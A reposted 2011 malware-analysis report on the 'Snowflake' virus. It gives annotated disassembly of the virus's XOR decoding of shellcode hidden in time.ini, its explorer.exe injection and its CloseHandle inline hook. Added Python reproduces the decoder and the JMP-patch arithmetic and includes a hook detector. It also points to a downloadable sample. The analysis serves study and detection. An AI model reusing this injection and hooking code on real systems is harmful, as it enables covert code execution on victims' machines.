Snowflake Virus Analysis Report
Author: wParma
Date: 2011-05-21
Link: http://bbs.pediy.com/showthread.php?t=134304
Sample: click to download
Archive password: virus
Preface:
The Snowflake virus has been making its rounds for a while now and every major anti-virus product detects and removes it completely, but a few of the ideas in it are worth a look, so I am sharing them here.
Characteristics of the virus
1. The main program and the malicious code are separated; the malicious code is stored, encrypted, as shellcode in a separate configuration file.
2. It can only cause harm once: after the program has run once, the malicious code is overwritten.
Overview
The main focus of this analysis:
the virus injects malicious code into explorer.exe and inline-hooks CloseHandle so that the malicious code gets a chance to execute.
Analysis
1. The overall flow of the virus is simple and clear:
load time.ini -----> decode time.ini -----> rewrite the contents of time.ini -----> execute the malicious code held in time.ini
The flowchart is shown below:
The following describes mainly the decoding of time.ini and the execution of the malicious code (shellcode) in time.ini:
1.1 Decoding time.ini
Decoding consists of two XORs of the encrypted data, with key1 and key2. key2 is stored at offset 0 of time.ini, i.e. the first few bytes, 0x00505372; key1 starts at 0 and is updated after every decoded dword by adding the decoded result to it.
The detailed flow is shown in the figure below:
The code with brief comments:

```asm
; decoding of time.ini
00401926  > /8B4D E8        mov     ecx, dword ptr [ebp-18]
00401929  . |83C1 04        add     ecx, 4
0040192C  . |894D E8        mov     dword ptr [ebp-18], ecx
0040192F  > |8B55 E8        mov     edx, dword ptr [ebp-18]
00401932  . |3B55 E4        cmp     edx, dword ptr [ebp-1C]
00401935  . |7D 33          jge     short 0040196A          ; decryption finished?
00401937  . |8B45 08        mov     eax, dword ptr [ebp+8]
0040193A  . |0345 E8        add     eax, dword ptr [ebp-18]
0040193D  . |8B08           mov     ecx, dword ptr [eax]
0040193F  . |894D EC        mov     dword ptr [ebp-14], ecx ; fetch the encrypted dword
00401942  . |8B55 EC        mov     edx, dword ptr [ebp-14]
00401945  . |3355 F0        xor     edx, dword ptr [ebp-10] ; xor the encrypted data with key1
00401948  . |8955 EC        mov     dword ptr [ebp-14], edx
0040194B  . |8B45 EC        mov     eax, dword ptr [ebp-14]
0040194E  . |3345 F8        xor     eax, dword ptr [ebp-8]  ; xor the first result with key2 (key2 comes from time.ini+0)
00401951  . |8945 EC        mov     dword ptr [ebp-14], eax
00401954  . |8B4D F0        mov     ecx, dword ptr [ebp-10]
00401957  . |034D EC        add     ecx, dword ptr [ebp-14] ; update key1: key1 += decrypted dword
0040195A  . |894D F0        mov     dword ptr [ebp-10], ecx
0040195D  . |8B55 08        mov     edx, dword ptr [ebp+8]
00401960  . |0355 E8        add     edx, dword ptr [ebp-18]
00401963  . |8B45 EC        mov     eax, dword ptr [ebp-14]
00401966  . |8902           mov     dword ptr [edx], eax    ; store the decrypted dword
00401968  .^\EB BC          jmp     short 00401926
```
After the decoding process above, the data in time.ini has become executable shellcode.
1.2 Execution of the malicious code (shellcode) in time.ini
1.2.1 Starting position of shellcode execution
The starting position of shellcode execution is computed from the offset stored at time.ini+0x8: the in-memory address of time.ini+0xc is the base, and the dword at time.ini+0x8 is added to it as the offset.
The code, with brief comments, is as follows:
```asm
0040150D  |.  8B11           mov     edx, dword ptr [ecx]
0040150F  |.  8955 FC        mov     dword ptr [ebp-4], edx   ; offset: entry offset of the shellcode, read from time.ini+0x8
00401512  |.  8B45 08        mov     eax, dword ptr [ebp+8]
00401515  |.  83C0 04        add     eax, 4                   ; baseaddress: in-memory address of time.ini+0xc
00401518  |.  8945 F8        mov     dword ptr [ebp-8], eax
0040151B  |.  8B4D F8        mov     ecx, dword ptr [ebp-8]
0040151E  |.  034D FC        add     ecx, dword ptr [ebp-4]   ; shellOEP = baseaddress + offset: where the shellcode starts executing
00401521  |.  0FBE11         movsx   edx, byte ptr [ecx]
00401524  |.  83FA 55        cmp     edx, 55                  ; verify shellOEP via a signature byte
00401527  |.  0F85 94000000  jnz     004015C1
```
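To make the two computations from sections 1.1 and 1.2.1 concrete, here is an added Python re-implementation of the time.ini decoding loop at 00401926 and of the entry-point calculation at 0040150D. It is not code from the original post or from the sample. It assumes the file layout the analysis implies but never states outright: key2 at offset 0, the entry offset at offset 8, and the encoded body starting at offset 0xC; the dword at offset 4 is treated as unused. The sample bytes are constructed, with key2 set to the 0x00505372 quoted above.

```python
import struct

# Assumed time.ini layout (inferred from the analysis, not documented by the sample):
#   +0x0  key2 (dword)      +0x8  entry offset (dword)      +0xC  encoded body
BODY_OFFSET = 0xC
ENTRY_OFFSET_FIELD = 0x8
MASK32 = 0xFFFFFFFF


def decode_body(buf: bytes) -> bytes:
    """Mirror of the loop at 00401926: for every dword of the body,
    dec = (enc ^ key1) ^ key2, then key1 += dec (mod 2**32)."""
    if len(buf) < BODY_OFFSET or (len(buf) - BODY_OFFSET) % 4:
        raise ValueError("body must be a whole number of dwords")
    key2 = struct.unpack_from("<I", buf, 0)[0]   # key2 lives at time.ini+0
    key1 = 0                                     # key1 starts at zero
    out = bytearray(buf)                         # header is copied through unchanged
    for off in range(BODY_OFFSET, len(buf), 4):
        enc = struct.unpack_from("<I", buf, off)[0]
        dec = (enc ^ key1) ^ key2
        key1 = (key1 + dec) & MASK32             # key1 is transformed by adding the decoded dword
        struct.pack_into("<I", out, off, dec)
    return bytes(out)


def encode_body(header: bytes, plain: bytes) -> bytes:
    """Inverse of decode_body; used here only to build a test fixture."""
    key2 = struct.unpack_from("<I", header, 0)[0]
    key1 = 0
    out = bytearray(header)
    for off in range(0, len(plain), 4):
        p = struct.unpack_from("<I", plain, off)[0]
        out += struct.pack("<I", (p ^ key1) ^ key2)
        key1 = (key1 + p) & MASK32
    return bytes(out)


def shellcode_entry(decoded: bytes):
    """Mirror of 0040150D: entry = (time.ini+0xC) + dword at time.ini+0x8,
    accepted only if the byte there is 0x55 (push ebp). Returns the buffer
    index of the entry, or None if the signature check fails."""
    rel = struct.unpack_from("<I", decoded, ENTRY_OFFSET_FIELD)[0]
    entry = BODY_OFFSET + rel
    if entry >= len(decoded) or decoded[entry] != 0x55:
        return None
    return entry


# Constructed fixture: key2 = 0x00505372 as quoted in the analysis, entry offset 0,
# and a body that starts with a typical "push ebp / mov ebp, esp" prologue.
SAMPLE_HEADER = struct.pack("<III", 0x00505372, 0, 0)
SAMPLE_PLAIN = bytes.fromhex("558bec83" "33c09090" "5dc30000")
SAMPLE_ENCODED = encode_body(SAMPLE_HEADER, SAMPLE_PLAIN)

if __name__ == "__main__":
    dec = decode_body(SAMPLE_ENCODED)
    print("decoded body:", dec[BODY_OFFSET:].hex())
    print("shellcode entry index:", shellcode_entry(dec))
```

Running the encoded fixture through the decoder recovers the prologue bytes, and the entry check only accepts the decoded buffer: on the still-encoded buffer the byte at offset 0xC is 0x27 rather than 0x55, which is exactly the failure path the jnz at 00401527 takes.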
The overall flow after entering the shellcode at the offset computed above is shown below:
1.2.2.1 Obtaining the kernel32 base address:
The kernel32 base address is obtained via fs:0; senior members of the forum have already explained this in detail, so it is not repeated here.
1.2.2.2 Obtaining APIs:
When resolving APIs the virus checks for breakpoints and lightly mangles the address: it subtracts 1 from the function address, so that during dynamic analysis you cannot see the function name, which is quite inconvenient, and it may also evade some proactive-defence (HIPS) products.
Restoring it is just as simple: NOP out the two instructions at 00C5036F and 00C50375.
The code is as follows:
```asm
; breakpoint check and simple address mangling
00C5036C    8038 CC          cmp     byte ptr [eax], 0CC      ; is there a breakpoint on the resolved function?
00C5036F    74 7F            je      short 00C503F0
00C50371    48               dec     eax                      ; resolved function address - 1
00C50372    8038 90          cmp     byte ptr [eax], 90       ; is the byte now pointed at a nop? if not, restore the address
00C50375    74 01            je      short 00C50378
00C50377    40               inc     eax
```
1.2.2.3 Enumerating processes:
The code that enumerates processes looking for explorer.exe is unremarkable, so I will not go into it.
1.2.2.4 Injecting the malicious code into explorer.exe and inline-hooking CloseHandle
Once explorer.exe is found it is opened with OpenProcess, and the first five bytes of the CloseHandle function inside explorer.exe are read and saved. The address of CloseHandle in explorer.exe is simply taken to be the virus's own CloseHandle address, because in most cases kernel32.dll has the same base address in different processes; that assumption holds here as well.
With the location of CloseHandle known, the function in explorer.exe can be hooked. Before hooking, the virus first writes the hook's destination function into explorer.exe and computes the code for the hook point:
```asm
00C5C64B    85C0              test    eax, eax
00C5C64D    0F84 F3000000     je      00C5C746
00C5C653    8B45 D6           mov     eax, dword ptr [ebp-2A]
00C5C656    3D 8BFF558B       cmp     eax, 8B55FF8B           ; compare against a signature to verify the read succeeded
00C5C65B    0F85 DE000000     jnz     00C5C73F
00C5C661    6A 40             push    40
00C5C663    68 00100000       push    1000
00C5C668    68 14C80000       push    0C814
00C5C66D    6A 00             push    0
00C5C66F    FF75 F8           push    dword ptr [ebp-8]
00C5C672    E8 04000000       call    00C5C67B                ; read succeeded: allocate a block of memory in explorer.exe
00C5C677    E7 BD             out     0BD, eax
00C5C679    0000              add     byte ptr [eax], al
00C5C67B    58                pop     eax
00C5C67C    2B00              sub     eax, dword ptr [eax]
00C5C67E    FF10              call    dword ptr [eax]
00C5C680    85C0              test    eax, eax
00C5C682    0F84 BE000000     je      00C5C746
00C5C688    8945 F4           mov     dword ptr [ebp-C], eax  ; save the allocated address
00C5C68B    8D45 D6           lea     eax, dword ptr [ebp-2A]
00C5C68E    C600 E9           mov     byte ptr [eax], 0E9
00C5C691    B9 F4C40000       mov     ecx, 0C4F4              ; entry offset of the shellcode injected into explorer.exe; a hard-coded value
00C5C696    034D F4           add     ecx, dword ptr [ebp-C]  ; compute the address where the injected shellcode starts executing
00C5C699    2B4D E4           sub     ecx, dword ptr [ebp-1C]
00C5C69C    83E9 05           sub     ecx, 5                  ; compute the JMP operand (the code for the hook point)
00C5C69F    8948 01           mov     dword ptr [eax+1], ecx
00C5C6A2    C745 EC 14C80000  mov     dword ptr [ebp-14], 0C814
00C5C6A9    C745 F0 00000000  mov     dword ptr [ebp-10], 0
00C5C6B0    C745 E8 00000000  mov     dword ptr [ebp-18], 0
00C5C6B7    837D EC 00        cmp     dword ptr [ebp-14], 0
00C5C6BB    74 42             je      short 00C5C6FF
00C5C6BD    8D45 F0           lea     eax, dword ptr [ebp-10]
00C5C6C0    50                push    eax
00C5C6C1    FF75 EC           push    dword ptr [ebp-14]
00C5C6C4    E8 04000000       call    00C5C6CD
00C5C6C9    BD C6000058       mov     ebp, 580000C6
00C5C6CE    2B00              sub     eax, dword ptr [eax]
00C5C6D0    0345 E8           add     eax, dword ptr [ebp-18]
00C5C6D3    50                push    eax
00C5C6D4    8B45 F4           mov     eax, dword ptr [ebp-C]
00C5C6D7    0345 E8           add     eax, dword ptr [ebp-18]
00C5C6DA    50                push    eax
00C5C6DB    FF75 F8           push    dword ptr [ebp-8]
00C5C6DE    E8 04000000       call    00C5C6E7                ; write the decoded data starting at time.ini+0xc into explorer.exe's address space
```
After writing the shellcode into the target process, the virus hooks kernel32.CloseHandle in the target process. The code is as follows:

```asm
00C5C719    FF10              call    dword ptr [eax]         ; change the memory protection at CloseHandle
00C5C71B    85C0              test    eax, eax
00C5C71D    74 27             je      short 00C5C746
00C5C71F    6A 00             push    0
00C5C721    6A 05             push    5
00C5C723    8D45 D6           lea     eax, dword ptr [ebp-2A]
00C5C726    50                push    eax
00C5C727    FF75 E4           push    dword ptr [ebp-1C]
00C5C72A    FF75 F8           push    dword ptr [ebp-8]
00C5C72D    E8 04000000       call    00C5C736                ; replace the first 5 bytes of CloseHandle with the JMP computed in the previous step
```
After the shellcode injection and the inline hook of CloseHandle above, the virus code can gain execution during the normal running of explorer.exe.
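The hook-point arithmetic at 00C5C68E..00C5C69F and the signature check at 00C5C656 come down to a few lines. The following Python is an added example, not code from the post or from the sample: it reproduces the 5-byte JMP computation the virus performs and, from the defender's side, inspects the first bytes read at an API address and reports where a JMP hook points, which is the check a memory-forensics tool runs over kernel32 exports to find this kind of inline hook. The CloseHandle address and the allocated block address are constructed; the hard-coded entry offset 0xC4F4 and the prologue signature 8B FF 55 8B are the ones in the listing.

```python
import struct

MASK32 = 0xFFFFFFFF
JMP_LEN = 5                                  # E9 rel32 is five bytes, hence "sub ecx, 5"
CLOSEHANDLE_SIG = bytes.fromhex("8bff558b")  # mov edi,edi / push ebp / mov ebp,esp (cmp eax, 8B55FF8B)
INJECTED_ENTRY_OFFSET = 0xC4F4               # hard-coded offset from the listing at 00C5C691


def has_expected_prologue(first_bytes: bytes) -> bool:
    """Mirror of 00C5C656: the first dword read from CloseHandle must equal
    8B55FF8B, i.e. the bytes 8B FF 55 8B in memory order."""
    return first_bytes[:4] == CLOSEHANDLE_SIG


def build_jmp_patch(hook_addr: int, alloc_base: int) -> bytes:
    """Mirror of 00C5C68E..00C5C69F: E9 + (alloc_base + 0xC4F4 - hook_addr - 5)."""
    target = (alloc_base + INJECTED_ENTRY_OFFSET) & MASK32
    rel = (target - hook_addr - JMP_LEN) & MASK32
    return b"\xE9" + struct.pack("<I", rel)


def jmp_hook_target(hook_addr: int, first_bytes: bytes):
    """Defender side: given the first five bytes read at an API's address,
    return the absolute destination if they start with a JMP rel32, else None.
    A kernel32 export whose prologue has become E9 xx xx xx xx is the trace
    this virus leaves behind in explorer.exe."""
    if len(first_bytes) < JMP_LEN or first_bytes[0] != 0xE9:
        return None
    rel = struct.unpack_from("<i", first_bytes, 1)[0]   # signed displacement
    return (hook_addr + JMP_LEN + rel) & MASK32


# Constructed addresses (not from the sample): a CloseHandle address and the
# block the allocation inside explorer.exe returned.
CLOSEHANDLE_ADDR = 0x7C801000
ALLOC_BASE = 0x00390000
ORIGINAL_PROLOGUE = bytes.fromhex("8bff558bec")

if __name__ == "__main__":
    patch = build_jmp_patch(CLOSEHANDLE_ADDR, ALLOC_BASE)
    print("original prologue ok:", has_expected_prologue(ORIGINAL_PROLOGUE))
    print("patch bytes:", patch.hex())
    print("hook target: %#x" % jmp_hook_target(CLOSEHANDLE_ADDR, patch))
```

The displacement is read back as a signed value because the injected block normally sits far below kernel32, so the JMP goes backwards; a detector that treats rel32 as unsigned reports a destination beyond the 4 GB address space and misses the hook. Comparing the bytes read from a live process against the same export's bytes in the on-disk kernel32.dll image is the general form of this check.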
After the two steps, inline hook and malicious code injection, explorer.exe's address space has changed as shown in the figures below.
Before the hook:
After the hook:
If explorer.exe calls the CloseHandle API, the malicious code shown below gets its chance to execute. It appears to be a downloader and is not the focus of this analysis.
The injected malicious shellcode:
That's a wrap.
Reposted from: https://www.cnblogs.com/wParma/archive/2011/06/17/2083986.html